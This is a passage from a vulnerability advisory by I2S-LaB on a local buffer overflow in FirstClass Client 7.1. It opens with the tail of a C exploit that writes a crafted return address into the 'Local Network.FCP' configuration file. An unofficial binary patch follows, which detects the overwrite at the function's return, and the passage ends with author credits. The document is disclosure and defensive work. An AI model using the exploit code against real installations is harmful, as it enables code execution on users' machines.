// Return Address: 0x00C2755F, little-endian.  16 + 4 = 20 bytes copied
// (incl. the NUL): 8 fill the token slot at [ebp-0Ch], 4 the result, 4
// the saved EBP and these 4 the return address.  The embedded NUL ends
// the C string, so this must stay the last thing in rawData (strlen()
// below stops here).  Where 0x00C2755F points is not derivable from this
// listing -- presumably the heap copy of the PROXYPORT sled; it is
// specific to this build and environment.
/////////////////////////////////////////////////////////////////
"\x5f\x75\xC2\x00";
// Banner
printf ("###############################################\n"
"FirstClass Client local buffer overflow Exploit\n"
"###############################################\n"
"Discovered & coded by I2S-LaB.\n\n"
"URL : http://www.I2S-LaB.com\n"
"MAIL : Contact[at]I2S-LaB.com\n\n");
// argv[argc] is NULL, so with no arguments the file name is substituted:
// it matches neither /restore nor /run and the usage text is printed.
if ( !argv[1]) argv[1] = FC_FILE;
(argc > 2 ) ? (p = argv[2]) : (p = PATH);
if ( !(SetCurrentDirectory( p ) ) )
{
printf ("cannot set current directory to %s\nexiting.\n", p);
ExitProcess(0);
}
if (!lstrcmpi (argv[1], "/restore") )
printf ("Restore the backup file...%s\n",
CopyFile ("Local Network.BAK", FC_FILE, FALSE) ? "ok" : "Error : backup file not found!\n");
else if ( !lstrcmpi (argv[1], "/run"))
{
// bFailIfExists = TRUE: a backup from an earlier run is kept, not replaced.
printf ("Saving the Local Network file...%s\n",
CopyFile (FC_FILE, "Local Network.BAK", TRUE) ? "ok" : "Backup file cannot be made");
printf ("Opening the Local Network file...");
// OPEN_EXISTING without truncation: fine here because the payload (2 750
// bytes in the demo) is longer than the original file (183 bytes), so no
// stale tail is left behind; it would not hold for a larger existing file.
FCP = CreateFile (FC_FILE, GENERIC_WRITE,
FILE_SHARE_WRITE, NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,NULL);
if (FCP == INVALID_HANDLE_VALUE)
{
printf ("cannot open Local Network file, exiting!\n");
ExitProcess (-1);
}
// strlen() + 1 writes the terminating NUL of the return address as well.
printf ("ok\nWriting the Local Network File...%s\n",
WriteFile (FCP, rawData, strlen (rawData) + 1, &NumberOfBytesWritten, NULL) ? "ok" : "Write file error!");
}
else printf ("usage : %s /RUN | /RESTORE [path to Local Network.FCP]\n\n"
"/RUN : launch the xploit against \"Local Network.FCP\"\n"
"/RESTORE : Restore the previous \"Local Network.FCP\"\n\n"
"[path to Local Network.FCP] : Optional,\ndefine the path of the \"Local Network.FCP\" to exploit.\n"
"Default is %s\n", argv[0], PATH);
}
Solution
________
Until the vendor publishes a patch, I2S-LaB offers an UNOFFICIAL patch, available upon request.
Please refer to http://www.i2s-lab.com/Research-tools.html to obtain the binary version of the following code.
Caveats: this patch does not remove the unbounded copies. It hooks the final "retn" of FCPProxyIPLong and, before
returning, checks that the return address on the stack is still the function's only legitimate caller
(CSerWTCP::Init, 0x0054BCB3); if it is not, a warning is shown and the process exits. By then the saved EBP and
the locals have already been overwritten, so this is detection of the exploit rather than a fix, and the hard-coded
offsets are only valid for the exact Fcc32.exe 7.1.0.0 build (the tool checks the file version before writing).
Apply the vendor's official fix as soon as it is available.
/******************************************************************
===================================================================
Unoffical patch for FirstClass Client 7.1 PROXYADDR buffer overflow
===================================================================
Coded by I2S-LaB.
Mail : Contact[at]I2S-LaB.com
Url : http://www.I2S-LaB.com
compilation : cl.exe (VC++6)
*******************************************************************/
#include <windows.h>   // file, version and process APIs
#include <stdio.h>     // printf, puts
#include <conio.h>     // getch
#include <string.h>    // (header names reconstructed: the original angle-bracket names were lost in extraction)
#pragma comment (lib, "version.lib")
#define DefaultPATH "C:\\Program Files\\FirstClass\\Fcc32.exe"
//////////////////////////////////////////////
// little class
//////////////////////////////////////////////
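// Minimal helper around a writable file handle plus the fixed file-version
// block of Fcc32.exe.  One instance per patched file; not copyable (the
// handle would be closed twice).
class I2S_ManipFile {
public :
// All members start in a known state; the original left FccInfo and
// pVersion uninitialised.
I2S_ManipFile() : FccInfo(0), File(0), var(0), pVersion(0) {}
// Only close a handle we actually opened: File is 0 before OpenFile() and
// INVALID_HANDLE_VALUE after a failed one, and CloseHandle() on either is an error.
~I2S_ManipFile() { if (File && File != INVALID_HANDLE_VALUE) CloseHandle (File); }
BOOL OpenFile (char *file);                                            // CreateFile(GENERIC_READ|GENERIC_WRITE)
int Write (DWORD offset, char *buffer, DWORD NumberOfByteToWrite);    // bytes written, -1 on error
BOOL ourGetVersion (char *file);                                       // fills FccInfo
VS_FIXEDFILEINFO *FccInfo;   // valid after a successful ourGetVersion()
private :
I2S_ManipFile(const I2S_ManipFile &);             // not implemented: copying is a bug
I2S_ManipFile &operator=(const I2S_ManipFile &);  // not implemented
HANDLE File;
DWORD var;
char *pVersion;
};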
//////////////////////////////////////////////
// get version
//////////////////////////////////////////////
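// Reads the VS_FIXEDFILEINFO block of `file` and points this->FccInfo at it.
// Returns FALSE (FccInfo untouched) if the file has no version resource or
// any of the three Version API calls fails.
//
// The original returned a pointer into a buffer it had just deleted:
// VerQueryValue() hands back an address inside pVersion, and main() then
// read FccInfo->dwFileVersionMS from freed memory.  The struct is now copied
// into function-local static storage that outlives the call; the tool is
// single-threaded and single-shot, so one copy is enough.
BOOL I2S_ManipFile::ourGetVersion(char *file)
{
static VS_FIXEDFILEINFO fixedInfo;
DWORD handle = 0;
DWORD size = GetFileVersionInfoSize(file, &handle);
if (!size)
return FALSE;
char *block = new char[size];
VS_FIXEDFILEINFO *info = 0;
UINT infoLen = 0;
BOOL ok = GetFileVersionInfo(file, 0, size, block)
&& VerQueryValue(block, "\\", (LPVOID *) &info, &infoLen)
&& info != 0
&& infoLen >= sizeof(VS_FIXEDFILEINFO);
if (ok)
{
fixedInfo = *info;
this->FccInfo = &fixedInfo;
}
delete[] block;           // new[] pairs with delete[]; `info` is dangling from here on
this->pVersion = 0;       // never left pointing at freed memory
return ok;
}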
//////////////////////////////////////////////
// Ouvre le fichier à patcher
//////////////////////////////////////////////
// Opens `file` for read/write (shared) and stores the handle in this->File.
// Returns TRUE on success; on failure this->File holds INVALID_HANDLE_VALUE.
// A handle from an earlier call is not closed (unchanged from the original).
BOOL I2S_ManipFile::OpenFile(char *file)
{
HANDLE h = CreateFile (file,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,
NULL);
this->File = h;
return h != INVALID_HANDLE_VALUE;
}
//////////////////////////////////////////////
// Ecrit des données dans le fichier
//////////////////////////////////////////////
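// Writes `NumberOfByteToWrite` bytes of `buffer` at absolute file offset
// `offset`.  Returns the number of bytes written, or -1 if no file is open,
// the seek fails, or WriteFile() fails.
//
// The original ignored both API results and returned an uninitialised count
// on failure, so a silent short/failed write looked like success to main().
int I2S_ManipFile::Write(DWORD offset, char *buffer, DWORD NumberOfByteToWrite)
{
DWORD NumberOfByteWritten = 0;
if (!this->File || this->File == INVALID_HANDLE_VALUE) return -1;
if (SetFilePointer (this->File, offset, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
return -1;
if (!WriteFile (this->File, buffer, NumberOfByteToWrite, &NumberOfByteWritten, NULL))
return -1;
return (int) NumberOfByteWritten;
}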
//////////////////////////////////////////////
// MAIN
//////////////////////////////////////////////
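// Usage: I2S-FC_fix.exe [Path\to\Fcc32.exe]
//
// Patches the epilogue of FCPProxyIPLong (retn at VA 0x562209 = file offset
// 0x162209) into a call to a small stub placed in a code cave at 0x625180.
// The stub checks that the return address on the stack is still the one
// legitimate caller (CSerWTCP::Init, 0x0054BCB3) and returns if so;
// otherwise it shows a message box and exits the process.  This detects the
// overwrite after it has happened -- it does not bound the copies -- and the
// offsets are only valid for Fcc32.exe 7.1.0.0, hence the version check.
int main (int argc, char *argv[])
{
char *PATH;
int i;
I2S_ManipFile FirstClass;
struct _info {
int offset;         // file offset to patch
char *buffer;       // bytes to write
int NumberOfByte;   // length of buffer.  The two strings are written WITHOUT a
// terminating NUL: the stub relies on the bytes after them
// in the code cave already being zero.
} Info[5] = {
{0x162209, "\xE8\x72\x2F\x0C\x00\xC3", 6}, // Call 00625180 ; ret  (overwrites the retn and 5 padding bytes)
{0x225180, "\x81\x7C\x24\x04\xB3\xBC\x54\x00" // cmp dword ptr [esp+04], 0054BCB3  ([esp+4] = FCPProxyIPLong's return address)
"\x75\x01" // jne 0062518B
"\xC3" // ret
"\x6A\x00" // push 00000000          (uType)
"\x68\x00\x53\x62\x00" // push 00625300   (lpCaption)
"\x68\x20\x53\x62\x00" // push 00625320   (lpText)
"\x6A\x00" // push 00000000          (hWnd)
"\xFF\x15\xB8\x66\x62\x00" // Call MessageBoxA
"\xFF\x15\xAC\x61\x62\x00", 37}, // Call ExitProcess
{0x225300, "I2S-LaB Warning !", 17},
{0x225320, "A buffer overflow attempt has been blocked. "
"Please, download the latest version of your FirstClass "
"client at http://www.centrinity.com to fix this problem.\x0d\x0a\x0d\x0a"
"for further technicals details, take a look at our security advisory : "
"http://www.I2S-LaB.com", 252},
{0,NULL,0},
};
printf ("##############################################\n"
"FirstClass Client version 7.1 Unofficial patch\n"
"##############################################\n"
"By I2S-LaB\n"
"----------------------\n"
"http://www.I2S-LaB.com\n"
"Contact[at]I2S-LaB.com\n"
"----------------------\n\n");
if (argc < 2)
{
PATH = DefaultPATH;
printf ("usage : I2S-FC_fix.exe [Path\\to\\Fcc32.exe]\n\n");
} else PATH = argv[1];
printf ("Do you realy want to patch %s ? [Y/N] : ", PATH);
int answer = getch ();
if (answer != 'y' && answer != 'Y')
{
printf ("\nexiting !\n");
ExitProcess(1);
}
// 458753 == 0x00070001 -> major 7, minor 1; build/private part (LS) must be 0.
printf ("\nRetrive version of Fcc32.exe : ");
if (FirstClass.ourGetVersion(PATH) && FirstClass.FccInfo->dwFileVersionMS == 458753 && FirstClass.FccInfo->dwFileVersionLS == 0)
printf ("Good version\n");
else
{
printf ("Bad version !\nExiting...\n");
ExitProcess(1);
}
printf ("\n\nopening %s...", PATH);
if (!FirstClass.OpenFile(PATH))
{
printf ("Error !\n");
ExitProcess(1);
}
// Refuse to patch without a backup, unless one from an earlier run already
// exists (CopyFile with bFailIfExists=TRUE then fails with ERROR_FILE_EXISTS).
// Note the backup lands in the current directory, not next to Fcc32.exe.
printf ("ok\nMaking backup file of %s...", PATH);
if (CopyFile (PATH, "Fcc32.bak", TRUE))
puts ("ok");
else if (GetLastError () == ERROR_FILE_EXISTS)
puts ("already exists, keeping it");
else
{
puts ("Not possible, exiting without patching");
ExitProcess(1);
}
// TODO(review): read back the byte at 0x162209 and require 0xC3 (retn)
// before writing, so a re-patched or otherwise modified binary is rejected.
printf ("patching binary file...");
for (i=0; Info[i].offset; i++)
{
if (FirstClass.Write(Info[i].offset, Info[i].buffer, Info[i].NumberOfByte) != Info[i].NumberOfByte)
{
printf ("short write at offset 0x%X, restore Fcc32.bak!\n", Info[i].offset);
ExitProcess(1);
}
}
puts ("ok");
return 0;
}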
Credit
______
Aurelien BOUDOUX, (aka ThreaT)
aurelien[at]I2S-LaB.com
Fred CHAVEROT, (aka ZaQ)
fred[at]I2S-LaB.com